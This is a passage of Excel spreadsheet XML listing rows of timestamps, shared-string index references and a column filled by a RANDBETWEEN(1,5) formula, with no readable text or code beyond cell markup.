      <c r="B3899" t="s">
        <v>5</v>
      </c>
      <c r="C3899" t="s">
        <v>6</v>
      </c>
      <c r="D3899" t="s">
        <v>25</v>
      </c>
      <c r="E3899" t="s">
        <v>3482</v>
      </c>
      <c r="F3899">
        <f t="shared" ca="1" si="60"/>
        <v>3</v>
      </c>
    </row>
    <row r="3900" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3900" s="1">
        <v>43486.506307870368</v>
      </c>
      <c r="B3900" t="s">
        <v>13</v>
      </c>
      <c r="C3900" t="s">
        <v>6</v>
      </c>
      <c r="D3900" t="s">
        <v>25</v>
      </c>
      <c r="E3900" t="s">
        <v>32</v>
      </c>
      <c r="F3900">
        <f t="shared" ca="1" si="60"/>
        <v>1</v>
      </c>
    </row>
    <row r="3901" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3901" s="1">
        <v>43486.497523148151</v>
      </c>
      <c r="B3901" t="s">
        <v>5</v>
      </c>
      <c r="C3901" t="s">
        <v>6</v>
      </c>
      <c r="D3901" t="s">
        <v>25</v>
      </c>
      <c r="E3901" t="s">
        <v>3485</v>
      </c>
      <c r="F3901">
        <f t="shared" ca="1" si="60"/>
        <v>3</v>
      </c>
    </row>
    <row r="3902" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3902" s="1">
        <v>43486.496689814812</v>
      </c>
      <c r="B3902" t="s">
        <v>35</v>
      </c>
      <c r="C3902" t="s">
        <v>71</v>
      </c>
      <c r="E3902" t="s">
        <v>3758</v>
      </c>
      <c r="F3902">
        <f t="shared" ca="1" si="60"/>
        <v>1</v>
      </c>
    </row>
    <row r="3903" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3903" s="1">
        <v>43486.492893518516</v>
      </c>
      <c r="B3903" t="s">
        <v>5</v>
      </c>
      <c r="C3903" t="s">
        <v>139</v>
      </c>
      <c r="E3903" t="s">
        <v>3766</v>
      </c>
      <c r="F3903">
        <f t="shared" ca="1" si="60"/>
        <v>4</v>
      </c>
    </row>
    <row r="3904" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3904" s="1">
        <v>43486.484166666669</v>
      </c>
      <c r="B3904" t="s">
        <v>19</v>
      </c>
      <c r="C3904" t="s">
        <v>10</v>
      </c>
      <c r="D3904" t="s">
        <v>178</v>
      </c>
      <c r="E3904" t="s">
        <v>3767</v>
      </c>
      <c r="F3904">
        <f t="shared" ca="1" si="60"/>
        <v>4</v>
      </c>
    </row>
    <row r="3905" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A3905" s="1">
        <v>43486.472199074073</v>
      </c>
      <c r="B3905" t="s">
        <v>19</v>
      </c>
      <c r="C3905" t="s">
        <v>6</v>
      </c>
      <c r="D3905" t="s">
        <v>25</v>
      </c>
      <c r="E3905" s="2" t="s">
        <v>3768</v>
      </c>
      <c r="F3905">
        <f t="shared" ca="1" si="60"/>
        <v>5</v>
      </c>
    </row>
    <row r="3906" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3906" s="1">
        <v>43486.462407407409</v>
      </c>
      <c r="B3906" t="s">
        <v>5</v>
      </c>
      <c r="C3906" t="s">
        <v>10</v>
      </c>
      <c r="D3906" t="s">
        <v>163</v>
      </c>
      <c r="E3906" t="s">
        <v>32</v>
      </c>
      <c r="F3906">
        <f t="shared" ref="F3906:F3969" ca="1" si="61">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="3907" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3907" s="1">
        <v>43486.453865740739</v>
      </c>
      <c r="B3907" t="s">
        <v>19</v>
      </c>
      <c r="C3907" t="s">
        <v>10</v>
      </c>
      <c r="D3907" t="s">
        <v>86</v>
      </c>
      <c r="E3907" t="s">
        <v>3769</v>
      </c>
      <c r="F3907">
        <f t="shared" ca="1" si="61"/>
        <v>5</v>
      </c>
    </row>
    <row r="3908" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3908" s="1">
        <v>43486.447893518518</v>
      </c>
      <c r="B3908" t="s">
        <v>5</v>
      </c>
      <c r="C3908" t="s">
        <v>6</v>
      </c>
      <c r="D3908" t="s">
        <v>7</v>
      </c>
      <c r="E3908" t="s">
        <v>3770</v>
      </c>
      <c r="F3908">
        <f t="shared" ca="1" si="61"/>
        <v>5</v>
      </c>
    </row>
    <row r="3909" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3909" s="1">
        <v>43486.418935185182</v>
      </c>
      <c r="B3909" t="s">
        <v>19</v>
      </c>
      <c r="C3909" t="s">
        <v>10</v>
      </c>
      <c r="D3909" t="s">
        <v>163</v>
      </c>
      <c r="E3909" t="s">
        <v>3771</v>
      </c>
      <c r="F3909">
        <f t="shared" ca="1" si="61"/>
        <v>4</v>
      </c>
    </row>
    <row r="3910" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A3910" s="1">
        <v>43486.412037037036</v>
      </c>
      <c r="B3910" t="s">
        <v>5</v>
      </c>
      <c r="C3910" t="s">
        <v>10</v>
      </c>
      <c r="D3910" t="s">
        <v>263</v>
      </c>
      <c r="E3910" s="2" t="s">
        <v>3772</v>
      </c>
      <c r="F3910">
        <f t="shared" ca="1" si="61"/>
        <v>2</v>
      </c>
    </row>
    <row r="3911" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3911" s="1">
        <v>43486.403923611113</v>
      </c>
      <c r="B3911" t="s">
        <v>5</v>
      </c>
      <c r="C3911" t="s">
        <v>10</v>
      </c>
      <c r="D3911" t="s">
        <v>229</v>
      </c>
      <c r="E3911" t="s">
        <v>3774</v>
      </c>
      <c r="F3911">
        <f t="shared" ca="1" si="61"/>
        <v>4</v>
      </c>
    </row>
    <row r="3912" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3912" s="1">
        <v>43486.403912037036</v>
      </c>
      <c r="B3912" t="s">
        <v>5</v>
      </c>
      <c r="C3912" t="s">
        <v>10</v>
      </c>
      <c r="D3912" t="s">
        <v>229</v>
      </c>
      <c r="E3912" t="s">
        <v>3774</v>
      </c>
      <c r="F3912">
        <f t="shared" ca="1" si="61"/>
        <v>3</v>
      </c>
    </row>
    <row r="3913" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A3913" s="1">
        <v>43486.398287037038</v>
      </c>
      <c r="B3913" t="s">
        <v>5</v>
      </c>
      <c r="C3913" t="s">
        <v>344</v>
      </c>
      <c r="E3913" s="2" t="s">
        <v>3775</v>
      </c>
      <c r="F3913">
        <f t="shared" ca="1" si="61"/>
        <v>4</v>
      </c>
    </row>
    <row r="3914" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3914" s="1">
        <v>43486.398043981484</v>
      </c>
      <c r="B3914" t="s">
        <v>1305</v>
      </c>
      <c r="C3914" t="s">
        <v>60</v>
      </c>
      <c r="E3914" t="s">
        <v>3776</v>
      </c>
      <c r="F3914">
        <f t="shared" ca="1" si="61"/>
        <v>3</v>
      </c>
    </row>
    <row r="3915" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3915" s="1">
        <v>43486.381030092591</v>
      </c>
      <c r="B3915" t="s">
        <v>5</v>
      </c>
      <c r="C3915" t="s">
        <v>48</v>
      </c>
      <c r="F3915">
        <f t="shared" ca="1" si="61"/>
        <v>1</v>
      </c>
    </row>
    <row r="3916" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3916" s="1">
        <v>43486.38040509259</v>
      </c>
      <c r="B3916" t="s">
        <v>5</v>
      </c>
      <c r="C3916" t="s">
        <v>48</v>
      </c>
      <c r="F3916">
        <f t="shared" ca="1" si="61"/>
        <v>1</v>
      </c>
    </row>
    <row r="3917" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3917" s="1">
        <v>43486.349328703705</v>
      </c>
      <c r="B3917" t="s">
        <v>5</v>
      </c>
      <c r="C3917" t="s">
        <v>10</v>
      </c>
      <c r="D3917" t="s">
        <v>86</v>
      </c>
      <c r="E3917" t="s">
        <v>3777</v>
      </c>
      <c r="F3917">
        <f t="shared" ca="1" si="61"/>
        <v>1</v>
      </c>
    </row>
    <row r="3918" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A3918" s="1">
        <v>43486.323472222219</v>
      </c>
      <c r="B3918" t="s">
        <v>5</v>
      </c>
      <c r="C3918" t="s">
        <v>71</v>
      </c>
      <c r="E3918" s="2" t="s">
        <v>3778</v>
      </c>
      <c r="F3918">
        <f t="shared" ca="1" si="61"/>
        <v>4</v>
      </c>
    </row>
    <row r="3919" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3919" s="1">
        <v>43486.303391203706</v>
      </c>
      <c r="B3919" t="s">
        <v>19</v>
      </c>
      <c r="C3919" t="s">
        <v>60</v>
      </c>
      <c r="E3919" t="s">
        <v>3779</v>
      </c>
      <c r="F3919">
        <f t="shared" ca="1" si="61"/>
        <v>5</v>
      </c>
    </row>
    <row r="3920" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A3920" s="1">
        <v>43486.23777777778</v>
      </c>
      <c r="B3920" t="s">
        <v>5</v>
      </c>
      <c r="C3920" t="s">
        <v>48</v>
      </c>
      <c r="D3920" t="s">
        <v>312</v>
      </c>
      <c r="E3920" s="2" t="s">
        <v>3780</v>
      </c>
      <c r="F3920">
        <f t="shared" ca="1" si="61"/>
        <v>2</v>
      </c>
    </row>
    <row r="3921" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3921" s="1">
        <v>43486.232835648145</v>
      </c>
      <c r="B3921" t="s">
        <v>19</v>
      </c>
      <c r="C3921" t="s">
        <v>50</v>
      </c>
      <c r="E3921" t="s">
        <v>3781</v>
      </c>
      <c r="F3921">
        <f t="shared" ca="1" si="61"/>
        <v>3</v>
      </c>
    </row>
    <row r="3922" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A3922" s="1">
        <v>43486.227361111109</v>
      </c>
      <c r="B3922" t="s">
        <v>1305</v>
      </c>
      <c r="C3922" t="s">
        <v>2082</v>
      </c>
      <c r="E3922" s="2" t="s">
        <v>3782</v>
      </c>
      <c r="F3922">
        <f t="shared" ca="1" si="61"/>
        <v>4</v>
      </c>
    </row>
    <row r="3923" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3923" s="1">
        <v>43486.221087962964</v>
      </c>
      <c r="B3923" t="s">
        <v>19</v>
      </c>
      <c r="C3923" t="s">
        <v>65</v>
      </c>
      <c r="E3923" t="s">
        <v>3783</v>
      </c>
      <c r="F3923">
        <f t="shared" ca="1" si="61"/>
        <v>4</v>
      </c>
    </row>
    <row r="3924" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A3924" s="1">
        <v>43486.19190972222</v>
      </c>
      <c r="B3924" t="s">
        <v>19</v>
      </c>
      <c r="C3924" t="s">
        <v>559</v>
      </c>
      <c r="E3924" s="2" t="s">
        <v>3784</v>
      </c>
      <c r="F3924">
        <f t="shared" ca="1" si="61"/>
        <v>1</v>
      </c>
    </row>
    <row r="3925" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A3925" s="1">
        <v>43486.13449074074</v>
      </c>
      <c r="B3925" t="s">
        <v>5</v>
      </c>
      <c r="C3925" t="s">
        <v>41</v>
      </c>
      <c r="E3925" s="2" t="s">
        <v>3785</v>
      </c>
      <c r="F3925">
        <f t="shared" ca="1" si="61"/>
        <v>4</v>
      </c>
    </row>
    <row r="3926" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A3926" s="1">
        <v>43486.127754629626</v>
      </c>
      <c r="B3926" t="s">
        <v>13</v>
      </c>
      <c r="C3926" t="s">
        <v>16</v>
      </c>
      <c r="D3926" t="s">
        <v>312</v>
      </c>
      <c r="E3926" s="2" t="s">
        <v>3786</v>
      </c>
      <c r="F3926">
        <f t="shared" ca="1" si="61"/>
        <v>2</v>
      </c>
    </row>
    <row r="3927" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A3927" s="1">
        <v>43486.11928240741</v>
      </c>
      <c r="B3927" t="s">
        <v>13</v>
      </c>
      <c r="C3927" t="s">
        <v>173</v>
      </c>
      <c r="E3927" s="2" t="s">
        <v>3787</v>
      </c>
      <c r="F3927">
        <f t="shared" ca="1" si="61"/>
        <v>2</v>
      </c>
    </row>
    <row r="3928" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A3928" s="1">
        <v>43486.099745370368</v>
      </c>
      <c r="B3928" t="s">
        <v>5</v>
      </c>
      <c r="C3928" t="s">
        <v>41</v>
      </c>
      <c r="E3928" s="2" t="s">
        <v>3788</v>
      </c>
      <c r="F3928">
        <f t="shared" ca="1" si="61"/>
        <v>2</v>
      </c>
    </row>
    <row r="3929" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3929" s="1">
        <v>43486.072835648149</v>
      </c>
      <c r="B3929" t="s">
        <v>13</v>
      </c>
      <c r="C3929" t="s">
        <v>1050</v>
      </c>
      <c r="E3929" t="s">
        <v>3789</v>
      </c>
      <c r="F3929">
        <f t="shared" ca="1" si="61"/>
        <v>3</v>
      </c>
    </row>
    <row r="3930" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3930" s="1">
        <v>43486.032962962963</v>
      </c>
      <c r="B3930" t="s">
        <v>5</v>
      </c>
      <c r="C3930" t="s">
        <v>41</v>
      </c>
      <c r="E3930" t="s">
        <v>3790</v>
      </c>
      <c r="F3930">
        <f t="shared" ca="1" si="61"/>
        <v>3</v>
      </c>
    </row>
    <row r="3931" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3931" s="1">
        <v>43486.031828703701</v>
      </c>
      <c r="B3931" t="s">
        <v>35</v>
      </c>
      <c r="C3931" t="s">
        <v>10</v>
      </c>
      <c r="D3931" t="s">
        <v>36</v>
      </c>
      <c r="E3931" t="s">
        <v>3791</v>
      </c>
      <c r="F3931">
        <f t="shared" ca="1" si="61"/>
        <v>2</v>
      </c>
    </row>
    <row r="3932" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3932" s="1">
        <v>43486.019270833334</v>
      </c>
      <c r="B3932" t="s">
        <v>13</v>
      </c>
      <c r="C3932" t="s">
        <v>10</v>
      </c>
      <c r="D3932" t="s">
        <v>336</v>
      </c>
      <c r="E3932" t="s">
        <v>3792</v>
      </c>
      <c r="F3932">
        <f t="shared" ca="1" si="61"/>
        <v>5</v>
      </c>
    </row>
    <row r="3933" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3933" s="1">
        <v>43486.003136574072</v>
      </c>
      <c r="B3933" t="s">
        <v>5</v>
      </c>
      <c r="C3933" t="s">
        <v>139</v>
      </c>
      <c r="E3933" t="s">
        <v>3793</v>
      </c>
      <c r="F3933">
        <f t="shared" ca="1" si="61"/>
        <v>3</v>
      </c>
    </row>
    <row r="3934" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3934" s="1">
        <v>43485.996874999997</v>
      </c>
      <c r="B3934" t="s">
        <v>13</v>
      </c>
      <c r="C3934" t="s">
        <v>140</v>
      </c>
      <c r="D3934" t="s">
        <v>141</v>
      </c>
      <c r="E3934" t="s">
        <v>3794</v>
      </c>
      <c r="F3934">
        <f t="shared" ca="1" si="61"/>
        <v>4</v>
      </c>
    </row>
    <row r="3935" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3935" s="1">
        <v>43485.995937500003</v>
      </c>
      <c r="B3935" t="s">
        <v>1305</v>
      </c>
      <c r="C3935" t="s">
        <v>60</v>
      </c>
      <c r="E3935" t="s">
        <v>3795</v>
      </c>
      <c r="F3935">
        <f t="shared" ca="1" si="61"/>
        <v>1</v>
      </c>
    </row>
    <row r="3936" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A3936" s="1">
        <v>43485.961655092593</v>
      </c>
      <c r="B3936" t="s">
        <v>19</v>
      </c>
      <c r="C3936" t="s">
        <v>10</v>
      </c>
      <c r="D3936" t="s">
        <v>36</v>
      </c>
      <c r="E3936" s="2" t="s">
        <v>3796</v>
      </c>
      <c r="F3936">
        <f t="shared" ca="1" si="61"/>
        <v>1</v>
      </c>
    </row>
    <row r="3937" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3937" s="1">
        <v>43485.955289351848</v>
      </c>
      <c r="B3937" t="s">
        <v>19</v>
      </c>
      <c r="C3937" t="s">
        <v>10</v>
      </c>
      <c r="D3937" t="s">
        <v>6</v>
      </c>
      <c r="E3937" t="s">
        <v>3797</v>
      </c>
      <c r="F3937">
        <f t="shared" ca="1" si="61"/>
        <v>2</v>
      </c>
    </row>
    <row r="3938" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3938" s="1">
        <v>43485.904479166667</v>
      </c>
      <c r="B3938" t="s">
        <v>13</v>
      </c>
      <c r="C3938" t="s">
        <v>253</v>
      </c>
      <c r="E3938" t="s">
        <v>3798</v>
      </c>
      <c r="F3938">
        <f t="shared" ca="1" si="61"/>
        <v>1</v>
      </c>
    </row>
    <row r="3939" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3939" s="1">
        <v>43485.89203703704</v>
      </c>
      <c r="B3939" t="s">
        <v>5</v>
      </c>
      <c r="C3939" t="s">
        <v>253</v>
      </c>
      <c r="E3939" t="s">
        <v>3799</v>
      </c>
      <c r="F3939">
        <f t="shared" ca="1" si="61"/>
        <v>4</v>
      </c>
    </row>
    <row r="3940" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3940" s="1">
        <v>43485.891250000001</v>
      </c>
      <c r="B3940" t="s">
        <v>5</v>
      </c>
      <c r="C3940" t="s">
        <v>253</v>
      </c>
      <c r="F3940">
        <f t="shared" ca="1" si="61"/>
        <v>1</v>
      </c>
    </row>
    <row r="3941" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A3941" s="1">
        <v>43485.848032407404</v>
      </c>
      <c r="B3941" t="s">
        <v>35</v>
      </c>
      <c r="C3941" t="s">
        <v>10</v>
      </c>
      <c r="D3941" t="s">
        <v>23</v>
      </c>
      <c r="E3941" s="2" t="s">
        <v>3800</v>
      </c>
      <c r="F3941">
        <f t="shared" ca="1" si="61"/>
        <v>1</v>
      </c>
    </row>
    <row r="3942" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3942" s="1">
        <v>43485.82476851852</v>
      </c>
      <c r="B3942" t="s">
        <v>5</v>
      </c>
      <c r="C3942" t="s">
        <v>408</v>
      </c>
      <c r="E3942" t="s">
        <v>3801</v>
      </c>
      <c r="F3942">
        <f t="shared" ca="1" si="61"/>
        <v>4</v>
      </c>
    </row>
    <row r="3943" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3943" s="1">
        <v>43485.805925925924</v>
      </c>
      <c r="B3943" t="s">
        <v>35</v>
      </c>
      <c r="C3943" t="s">
        <v>430</v>
      </c>
      <c r="E3943" t="s">
        <v>3802</v>
      </c>
      <c r="F3943">
        <f t="shared" ca="1" si="61"/>
        <v>4</v>
      </c>
    </row>
    <row r="3944" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A3944" s="1">
        <v>43485.79923611111</v>
      </c>
      <c r="B3944" t="s">
        <v>13</v>
      </c>
      <c r="C3944" t="s">
        <v>140</v>
      </c>
      <c r="D3944" t="s">
        <v>234</v>
      </c>
      <c r="E3944" s="2" t="s">
        <v>3803</v>
      </c>
      <c r="F3944">
        <f t="shared" ca="1" si="61"/>
        <v>4</v>
      </c>
    </row>
    <row r="3945" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A3945" s="1">
        <v>43485.69699074074</v>
      </c>
      <c r="B3945" t="s">
        <v>5</v>
      </c>
      <c r="C3945" t="s">
        <v>6</v>
      </c>
      <c r="D3945" t="s">
        <v>25</v>
      </c>
      <c r="E3945" s="2" t="s">
        <v>3804</v>
      </c>
      <c r="F3945">
        <f t="shared" ca="1" si="61"/>
        <v>2</v>
      </c>
    </row>
    <row r="3946" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A3946" s="1">
        <v>43485.524641203701</v>
      </c>
      <c r="B3946" t="s">
        <v>19</v>
      </c>
      <c r="C3946" t="s">
        <v>10</v>
      </c>
      <c r="D3946" t="s">
        <v>6</v>
      </c>
      <c r="E3946" s="2" t="s">
        <v>3805</v>
      </c>
      <c r="F3946">
        <f t="shared" ca="1" si="61"/>
        <v>5</v>
      </c>
    </row>
    <row r="3947" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3947" s="1">
        <v>43485.520474537036</v>
      </c>
      <c r="B3947" t="s">
        <v>13</v>
      </c>
      <c r="C3947" t="s">
        <v>477</v>
      </c>
      <c r="E3947" t="s">
        <v>3806</v>
      </c>
      <c r="F3947">
        <f t="shared" ca="1" si="61"/>
        <v>2</v>
      </c>
    </row>
    <row r="3948" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3948" s="1">
        <v>43485.498414351852</v>
      </c>
      <c r="B3948" t="s">
        <v>5</v>
      </c>
      <c r="C3948" t="s">
        <v>97</v>
      </c>
      <c r="E3948" t="s">
        <v>3807</v>
      </c>
      <c r="F3948">
        <f t="shared" ca="1" si="61"/>
        <v>2</v>
      </c>
    </row>
    <row r="3949" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3949" s="1">
        <v>43485.392210648148</v>
      </c>
      <c r="B3949" t="s">
        <v>1305</v>
      </c>
      <c r="C3949" t="s">
        <v>60</v>
      </c>
      <c r="E3949" t="s">
        <v>3808</v>
      </c>
      <c r="F3949">
        <f t="shared" ca="1" si="61"/>
        <v>1</v>
      </c>
    </row>
    <row r="3950" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3950" s="1">
        <v>43485.390694444446</v>
      </c>
      <c r="B3950" t="s">
        <v>1305</v>
      </c>
      <c r="C3950" t="s">
        <v>60</v>
      </c>
      <c r="E3950" t="s">
        <v>3808</v>
      </c>
      <c r="F3950">
        <f t="shared" ca="1" si="61"/>
        <v>3</v>
      </c>
    </row>
    <row r="3951" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3951" s="1">
        <v>43485.32</v>
      </c>
      <c r="B3951" t="s">
        <v>19</v>
      </c>
      <c r="C3951" t="s">
        <v>6</v>
      </c>
      <c r="D3951" t="s">
        <v>114</v>
      </c>
      <c r="E3951" t="s">
        <v>3809</v>
      </c>
      <c r="F3951">
        <f t="shared" ca="1" si="61"/>
        <v>2</v>
      </c>
    </row>
    <row r="3952" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A3952" s="1">
        <v>43485.151516203703</v>
      </c>
      <c r="B3952" t="s">
        <v>5</v>
      </c>
      <c r="C3952" t="s">
        <v>318</v>
      </c>
      <c r="E3952" s="2" t="s">
        <v>3810</v>
      </c>
      <c r="F3952">
        <f t="shared" ca="1" si="61"/>
        <v>5</v>
      </c>
    </row>
    <row r="3953" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3953" s="1">
        <v>43485.131423611114</v>
      </c>
      <c r="B3953" t="s">
        <v>19</v>
      </c>
      <c r="C3953" t="s">
        <v>60</v>
      </c>
      <c r="E3953" t="s">
        <v>3811</v>
      </c>
      <c r="F3953">
        <f t="shared" ca="1" si="61"/>
        <v>2</v>
      </c>
    </row>
    <row r="3954" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A3954" s="1">
        <v>43485.092916666668</v>
      </c>
      <c r="B3954" t="s">
        <v>1305</v>
      </c>
      <c r="C3954" t="s">
        <v>60</v>
      </c>
      <c r="E3954" s="2" t="s">
        <v>3812</v>
      </c>
      <c r="F3954">
        <f t="shared" ca="1" si="61"/>
        <v>3</v>
      </c>
    </row>
    <row r="3955" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A3955" s="1">
        <v>43485.091307870367</v>
      </c>
      <c r="B3955" t="s">
        <v>1305</v>
      </c>
      <c r="C3955" t="s">
        <v>60</v>
      </c>
      <c r="E3955" s="2" t="s">
        <v>3812</v>
      </c>
      <c r="F3955">
        <f t="shared" ca="1" si="61"/>
        <v>4</v>
      </c>
    </row>
    <row r="3956" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3956" s="1">
        <v>43485.055289351854</v>
      </c>
      <c r="B3956" t="s">
        <v>13</v>
      </c>
      <c r="C3956" t="s">
        <v>1510</v>
      </c>
      <c r="E3956" t="s">
        <v>3813</v>
      </c>
      <c r="F3956">
        <f t="shared" ca="1" si="61"/>
        <v>5</v>
      </c>
    </row>
    <row r="3957" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A3957" s="1">
        <v>43484.865069444444</v>
      </c>
      <c r="B3957" t="s">
        <v>35</v>
      </c>
      <c r="C3957" t="s">
        <v>10</v>
      </c>
      <c r="D3957" t="s">
        <v>36</v>
      </c>
      <c r="E3957" s="2" t="s">
        <v>3814</v>
      </c>
      <c r="F3957">
        <f t="shared" ca="1" si="61"/>
        <v>1</v>
      </c>
    </row>
    <row r="3958" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3958" s="1">
        <v>43484.7422337963</v>
      </c>
      <c r="B3958" t="s">
        <v>5</v>
      </c>
      <c r="C3958" t="s">
        <v>2192</v>
      </c>
      <c r="D3958" t="s">
        <v>750</v>
      </c>
      <c r="E3958" t="s">
        <v>3815</v>
      </c>
      <c r="F3958">
        <f t="shared" ca="1" si="61"/>
        <v>3</v>
      </c>
    </row>
    <row r="3959" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3959" s="1">
        <v>43484.625451388885</v>
      </c>
      <c r="B3959" t="s">
        <v>5</v>
      </c>
      <c r="C3959" t="s">
        <v>1130</v>
      </c>
      <c r="E3959" t="s">
        <v>3816</v>
      </c>
      <c r="F3959">
        <f t="shared" ca="1" si="61"/>
        <v>2</v>
      </c>
    </row>
    <row r="3960" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3960" s="1">
        <v>43484.589814814812</v>
      </c>
      <c r="B3960" t="s">
        <v>1305</v>
      </c>
      <c r="C3960" t="s">
        <v>749</v>
      </c>
      <c r="E3960" t="s">
        <v>3817</v>
      </c>
      <c r="F3960">
        <f t="shared" ca="1" si="61"/>
        <v>4</v>
      </c>
    </row>
    <row r="3961" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3961" s="1">
        <v>43484.47755787037</v>
      </c>
      <c r="B3961" t="s">
        <v>5</v>
      </c>
      <c r="C3961" t="s">
        <v>41</v>
      </c>
      <c r="F3961">
        <f t="shared" ca="1" si="61"/>
        <v>3</v>
      </c>
    </row>
    <row r="3962" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3962" s="1">
        <v>43484.44740740741</v>
      </c>
      <c r="B3962" t="s">
        <v>19</v>
      </c>
      <c r="C3962" t="s">
        <v>10</v>
      </c>
      <c r="D3962" t="s">
        <v>23</v>
      </c>
      <c r="E3962" t="s">
        <v>3818</v>
      </c>
      <c r="F3962">
        <f t="shared" ca="1" si="61"/>
        <v>3</v>
      </c>
    </row>
    <row r="3963" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A3963" s="1">
        <v>43484.353472222225</v>
      </c>
      <c r="B3963" t="s">
        <v>5</v>
      </c>
      <c r="C3963" t="s">
        <v>623</v>
      </c>
      <c r="D3963" t="s">
        <v>271</v>
      </c>
      <c r="E3963" s="2" t="s">
        <v>3819</v>
      </c>
      <c r="F3963">
        <f t="shared" ca="1" si="61"/>
        <v>4</v>
      </c>
    </row>
    <row r="3964" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A3964" s="1">
        <v>43484.172314814816</v>
      </c>
      <c r="B3964" t="s">
        <v>5</v>
      </c>
      <c r="C3964" t="s">
        <v>41</v>
      </c>
      <c r="E3964" s="2" t="s">
        <v>3820</v>
      </c>
      <c r="F3964">
        <f t="shared" ca="1" si="61"/>
        <v>3</v>
      </c>
    </row>
    <row r="3965" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A3965" s="1">
        <v>43484.172280092593</v>
      </c>
      <c r="B3965" t="s">
        <v>5</v>
      </c>
      <c r="C3965" t="s">
        <v>41</v>
      </c>
      <c r="E3965" s="2" t="s">
        <v>3820</v>
      </c>
      <c r="F3965">
        <f t="shared" ca="1" si="61"/>
        <v>3</v>
      </c>
    </row>
    <row r="3966" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3966" s="1">
        <v>43484.114039351851</v>
      </c>
      <c r="B3966" t="s">
        <v>5</v>
      </c>
      <c r="C3966" t="s">
        <v>92</v>
      </c>
      <c r="E3966" t="s">
        <v>3821</v>
      </c>
      <c r="F3966">
        <f t="shared" ca="1" si="61"/>
        <v>3</v>
      </c>
    </row>
    <row r="3967" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3967" s="1">
        <v>43484.087175925924</v>
      </c>
      <c r="B3967" t="s">
        <v>1305</v>
      </c>
      <c r="C3967" t="s">
        <v>60</v>
      </c>
      <c r="E3967" t="s">
        <v>3822</v>
      </c>
      <c r="F3967">
        <f t="shared" ca="1" si="61"/>
        <v>3</v>
      </c>
    </row>
    <row r="3968" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3968" s="1">
        <v>43483.963368055556</v>
      </c>
      <c r="B3968" t="s">
        <v>13</v>
      </c>
      <c r="C3968" t="s">
        <v>10</v>
      </c>
      <c r="D3968" t="s">
        <v>17</v>
      </c>
      <c r="E3968" t="s">
        <v>3823</v>
      </c>
      <c r="F3968">
        <f t="shared" ca="1" si="61"/>
        <v>4</v>
      </c>
    </row>
    <row r="3969" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A3969" s="1">
        <v>43483.884780092594</v>
      </c>
      <c r="B3969" t="s">
        <v>5</v>
      </c>
      <c r="C3969" t="s">
        <v>1080</v>
      </c>
      <c r="D3969" t="s">
        <v>721</v>
      </c>
